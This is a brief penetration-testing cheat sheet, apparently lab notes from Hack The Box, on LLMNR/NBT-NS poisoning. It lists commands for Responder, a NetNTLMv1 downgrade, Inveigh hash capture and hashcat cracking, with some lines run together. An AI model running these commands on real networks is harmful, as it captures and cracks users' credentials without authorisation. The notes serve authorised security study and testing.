LLMNR NBT-NS Poisoning

Responder
sudo responder -I ens224 hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 
Downgrade Attack
Responder.py -I eth0 -v --lm --disable-essNetNTLMv1 obtained - Convert the hash to NTLM - See Crack Hash
Inveigh
PS C:\htb> Import-Module .\Inveigh.ps1PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput YInvoke-Inveigh -IP '10.13.38.16' –NBNS Y –mDNS Y –Proxy Y -FileOutput Y -FileOutputDirectory 'c:\users\username\documents' -LogOutput YC# version
PS C:\htb> .\Inveigh.exePress ESC to enter/exit interactive console
GET NTLMV2UNIQUEGET NTLMV2USERNAMESNTLM Relay
SMB (445, 139) / RPCCoercer
More Tools: SMB
Last updated